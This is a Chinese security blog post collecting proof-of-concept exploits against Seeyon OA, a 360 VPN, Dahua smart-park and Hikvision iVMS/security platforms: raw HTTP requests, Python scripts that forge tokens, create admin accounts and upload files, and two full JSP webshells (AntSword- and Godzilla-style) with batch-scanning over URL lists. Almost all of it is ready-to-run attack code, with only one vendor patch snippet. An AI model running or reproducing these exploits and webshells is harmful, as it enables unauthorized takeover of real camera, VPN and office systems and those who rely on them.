

iloveflag-blog

poc_collection

iloveflag-blog

poc_collection

字数统计: 2.2k阅读时长: 13 min

 2023/09/08   Share

• 
• 
• 
• 
• 

致远OA任意用户重置

POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: 
Content-Type: application/json
Content-Length: 49

["loginName":"18888888888"，"password": "123456"]

短信验证码绕过重置密码漏洞补丁
需短信接口，否则用户无法重置密码

@POST
@Produces({"application/json"})
@Path("phoneCode/resetPassword")
@RestInterfaceAnnotation
public Response resetPassword(Map<String, Object> param) {
    HttpSession session = this.req.getSession(false);
    Object loginName = session.getAttribute("loginName");
    Object canModify = session.getAttribute("canModify");
    if (null != loginName && "true".equals(canModify) && PersonalBindController.isPass(session, 3)) {
        session.removeAttribute("seeyon_find_pwd_count");
        PrincipalManager principalManager = (PrincipalManager)AppContext.getBean("principalManager");
        String password = String.valueOf(param.get("password"));

        try {
            V3xOrgMember member = this.orgManager.getMemberByLoginName((String)loginName);
            if (member == null) {
                return this.fail("Member not exist!", 3);
            } else {
                V3xOrgMember memberBeforeUpdate = new V3xOrgMember();
                V3xOrgMember newMember = new V3xOrgMember();
                BeanUtils.copyProperties(memberBeforeUpdate, member);
                V3xOrgPrincipal newOrgPrincipal = new V3xOrgPrincipal(member.getId(), member.getLoginName(), password);
                member.setV3xOrgPrincipal(newOrgPrincipal);
                BeanUtils.copyProperties(newMember, member);
                OrganizationMessage om = principalManager.update(newOrgPrincipal);
                if (Strings.isNotEmpty(om.getErrorMsgs())) {
                    OrgHelper.throwBusinessExceptionTools(om);
                }

                if (LdapUtils.isLdapEnabled() && LdapUtils.isBind(member.getId())) {
                    LDAPConfig config = LDAPConfig.getInstance();
                    String type = config.getSys().getProperty("ldap.ad.enabled");
                    if ("ad".equals(type) && config.getIsEnableSSL() || "ldap".equals(type)) {
                        OrganizationLdapEvent event = (OrganizationLdapEvent)AppContext.getBean("organizationLdapEvent");
                        event.changePassword(memberBeforeUpdate, newMember);
                    }
                }

                ChangePwdEvent event = new ChangePwdEvent(this);
                event.setMember(member);
                EventDispatcher.fireEvent(event);
                session.removeAttribute("loginName");
                session.removeAttribute("canModify");
                return this.success(true, "success");
            }
        } catch (Exception var15) {
            return this.fail(JSONUtil.toJSONString(false), 3);
        }
    } else {
        return this.fail("非法操作！", 3);
    }
}

360vpn用户读取

GET /admin/group/x_group.php?id=2 HTTP/1.1
Host: 
Cookie: admin_id=1;gw_admin_ticket=1;

大华智慧园区文件上传

poc1

import requests
import argparse
import hashlib
# zip生成:python evilarc.py test.jsp -p opt/tomcat/webapps/upload/ -d 13 -o unix
username="test"
pwd="admin.123"
def calculate_md5(string):
    # 创建 MD5 对象
    md5_hash = hashlib.md5()

    # 更新 MD5 对象以包含要计算哈希值的数据
    md5_hash.update(string.encode('utf-8'))

    # 计算并获取十六进制表示的哈希值
    hex_hash = md5_hash.hexdigest()

    # 返回 MD5 哈希值
    return hex_hash

def get_cookie(url):
	username="test"
	pwd="admin.123"
	burp0_url=url+"/admin/sso_initSession.action"
	cookie=requests.get(burp0_url,verify=False).text
	return cookie

def create_user(url,cookie):
	burp0_url = url+"/admin/user_save.action"
	burp0_cookies = {"JSESSIONID": cookie}
	burp0_headers = {"Content-Type": "multipart/form-data; boundary=----cdbnafmv"}
	burp0_data = "------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.userType\"\r\n\r\n0\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.ownerCode\"\r\n\r\n001\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.isReuse\"\r\n\r\n0\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.macStat\"\r\n\r\n0\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.roleIds\"\r\n\r\n1\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.loginName\"\r\n\r\n"+username+"\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"displayedOrgName\"\r\n\r\n"+username+"\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.loginPass\"\r\n\r\n"+pwd+"\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"checkPass\"\r\n\r\n"+pwd+"\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.groupId\"\r\n\r\n0\r\n------cdbnafmv\r\nContent-Disposition: form-data; name=\"userBean.userName\"\r\n\r\n"+username+"\r\n------cdbnafmv--"
	r=requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data,verify=False)
	print("新建账户密码:"+username+'/'+pwd)

def upload(url):
	username="test"
	pwd="admin.1234"
	token="2f3632cf4f6c98233c203aaca4a20653" #cookie获取
	password=calculate_md5(username+":dss:"+pwd)
	burp0_url = url+"/admin/recover_recover.action?password="+password
	print(burp0_url)

def poc(url):
	cookie=get_cookie(url)
	create_user(url,cookie)
	#upload(url)

poc2

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982

--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="test.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

(马子）
--f3aeb22be281d77542546a2f71e20982--

海康ivms8700 文件上传

import requests
import hashlib
import json
import argparse
import urllib.request
# webshell密码:test

def md5(text):
	md5 = hashlib.md5()
	md5.update(text.encode('utf-8'))
	result = md5.hexdigest().upper()
	return result

def make_token(url):
	secretKey="secretKeyIbuilding"
	token=md5(url+"/eps/api/resourceOperations/upload"+secretKey)
	print("token="+token)
	return token

def poc(url):
	burp0_url = url+"/eps/api/resourceOperations/upload?token="+make_token(url)
	burp0_cookies = {"JSESSIONID": "F46DC6B87DF1263205F83C4DBADA8799", "JSESSIONID": "A057E1610B78BFA2886DC12A51AE15DC"}
	burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------64177297227648318974173496085", "Origin": "null", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
	burp0_data = "-----------------------------64177297227648318974173496085\r\nContent-Disposition: form-data; name=\"fileUploader\"; filename=\"test.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%!\r\nclass BLUB extends ClassLoader{\r\n  BLUB(ClassLoader c){super(c);}\r\n  public Class clone(byte[] b){\r\n    return super.defineClass(b, 0, b.length);\r\n  }\r\n}\r\npublic byte[] nondeclarative(String str) throws Exception {\r\n  Class base64;\r\n  byte[] value = null;\r\n  try {\r\n    base64=Class.forName(\"sun.misc.BASE64Decoder\");\r\n    Object decoder = base64.newInstance();\r\n    value = (byte[])decoder.getClass().getMethod(\"decodeBuffer\", new Class[] {String.class }).invoke(decoder, new Object[] { str });\r\n  } catch (Exception e) {\r\n    try {\r\n      base64=Class.forName(\"java.util.Base64\");\r\n      Object decoder = base64.getMethod(\"getDecoder\", null).invoke(base64, null);\r\n      value = (byte[])decoder.getClass().getMethod(\"decode\", new Class[] { String.class }).invoke(decoder, new Object[] { str });\r\n    } catch (Exception ee) {}\r\n  }\r\n  return value;\r\n}\r\n%>\r\n<%\r\nString cls = request.getParameter(\"test\");\r\nif (cls != null) {\r\n  new BLUB(this.getClass().getClassLoader()).clone(nondeclarative(cls)).newInstance().equals(new Object[]{request,response});\r\n}\r\n%>\r\n\r\n-----------------------------64177297227648318974173496085--\r\n"
	try:
		# print(requests.post(burp0_url).text)
		print("正在上传蚁剑webshell:")
		r=requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
		webshell=url+"/eps/upload/"+str(json.loads(r.text)['data']['resourceUuid'])+'.jsp'
		print(webshell)
	except Exception as e:
		print('error')

if __name__ == '__main__':
	parser = argparse.ArgumentParser(description='ivms-poc')
	parser.add_argument('-u',"--url", metavar='url', type=str, help='URL')
	parser.add_argument('-f', "--file",metavar='file', type=str, help='FILE')
	args = parser.parse_args()
	if args.url:
		print(args.url)
		poc(args.url)
	if args.file:
		for url in open(args.file).readlines():
			print(url)
			poc(url) 
	print('--------------------------------')

海康综合安防文件上传

import requests
import argparse
def poc(url):
	burp0_url = url+"/center/api/files;.js"
	burp0_cookies = {"JSESSIONID": "2AD22120C342A16B148D42DDB2B8C457"}
	burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------12719375598068828622754559132", "Origin": "null", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "cross-site", "Sec-Fetch-User": "?1"}
	burp0_data = "-----------------------------12719375598068828622754559132\r\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/test.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%! String xc=\"3c6e0b8a9c15224a\"; String pass=\"pass\"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(\"AES\");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),\"AES\"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance(\"MD5\");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName(\"java.util.Base64\");Object Encoder = base64.getMethod(\"getEncoder\", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod(\"encodeToString\", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName(\"sun.misc.BASE64Encoder\"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod(\"encode\", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName(\"java.util.Base64\");Object decoder = base64.getMethod(\"getDecoder\", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod(\"decode\", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName(\"sun.misc.BASE64Decoder\"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod(\"decodeBuffer\", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute(\"payload\")==null){session.setAttribute(\"payload\",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute(\"parameters\",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute(\"payload\")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}\r\n%>\r\n-----------------------------12719375598068828622754559132--\r\n"
	r=requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data,verify=False)
	print(r.text)
	# print("哥斯拉默认密码:"+burp0_url+"/clusterMgr/test.jsp;.js")
if __name__ == '__main__':
	parser = argparse.ArgumentParser(description='海康综合安防文件上传')
	parser.add_argument('-u',"--url", metavar='url', type=str, help='URL')
	parser.add_argument('-f', "--file",metavar='file', type=str, help='FILE')
	args = parser.parse_args()
	if args.url:
		print(args.url)
		poc(args.url)
	if args.file:
		for url in open(args.file).readlines():
			print(url)
			poc(url) 
	print('--------------------------------')

原文作者：iloveflag

原文链接：https://iloveflag.github.io/2023/09/08/poc-collection/

发表日期：September 8th 2023, 10:53:16 pm

更新日期：February 14th 2025, 10:45:19 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Previous Post
  QVD-2022-46174-thinkphp多语言RCE

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. 致远OA任意用户重置
2. 2. 360vpn用户读取
3. 3. 大华智慧园区文件上传
   1. 3.1. poc1
   2. 3.2. poc2
4. 4. 海康ivms8700 文件上传
5. 5. 海康综合安防文件上传



• Archive
• Tag
• Cate

Total : 61

2023

• 09/08poc_collection

2022

• 12/12QVD-2022-46174-thinkphp多语言RCE

2021

• 11/06数据结构-王道考研复习笔记

2020

• 09/23RSA与费马小定理
• 09/08awd总结
• 08/05CyBRICS2020
• 07/09浅谈phar文件在ctf中的应用
• 07/012020腾讯犀牛鸟网络安全T-Star高校挑战赛wp
• 06/14nginx-php-vscode-xdebug
• 06/13数据结构-浙大版咕咕咕了
• 01/16from_img_to_xss

2019

• 12/26hash_hmac_php_bug
• 08/27从面试中发现未学到的知识点
• 08/07hitcon-ctf-2017-ssrfme
• 08/04de1tactf2019_ssrf_me
• 08/04thinkphp5.0_sql_injection分析
• 07/13sql注入
• 07/12快速查询整理
• 06/15rbash逃逸
• 05/23vulhub-learning
• 05/14apache基于多ip的虚拟主机配置+文件服务器和账号密码
• 05/05pwn学习笔记
• 04/112019西湖论剑web
• 03/22Python脚本与Metasploit交互批量产出MS17_010 shell
• 03/05pentesterlab中xss+Code injection的练习
• 02/22hgame2019 部分web-wp
• 02/08phpMyAdmin提权

2018

• 11/27用updatexml报错注入技术解出2018nctf 滴!晨跑打卡
• 11/182018hctf web
• 10/26异或的研究
• 10/172018杭电公测ctf writeup
• 10/14百度杯2017年春秋欢乐赛
• 10/10Centos7 实现ngrok内网穿透
• 10/08kali 基本软件安装
• 09/232018安恒杯9月misc1 crc32碰撞
• 09/23第一届百度杯 upload
• 09/20wanna to see your hat? writeup
• 09/16centos7 django+uwsgi+nginx配置
• 09/13HITCON2017(babyfirst-revenge) writeup
• 09/10centos常见服务安装
• 08/23南邮ctf
• 08/18Docker的大坑记录
• 08/16requests进行文件上传
• 08/12浅谈文件上传的后缀检测
• 08/03sql注入与防御1(mysqli_real_escape_string)
• 07/232018安恒杯7月
• 07/23远程命令注入
• 07/03kali获取持续性后门shell
• 07/02ms17_010和ms08-067实验笔记
• 06/27javascript实现图片变换
• 06/20php 文件上传漏洞之%00截断上传
• 06/17centos6.4配置 httpd
• 06/17centos6.4配置dns服务器
• 06/17centos6.4配置nfs
• 06/17centos6.4配置samba
• 06/17centos6.4配置telnet
• 06/17centos6.4配置vpn
• 06/17kali下的wifi渗透测试
• 06/17kali下的wpscan破解wordpress
• 06/17windows和linux互通
• 06/17实验吧web思路

ctf 运维 rubbish pwn python



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

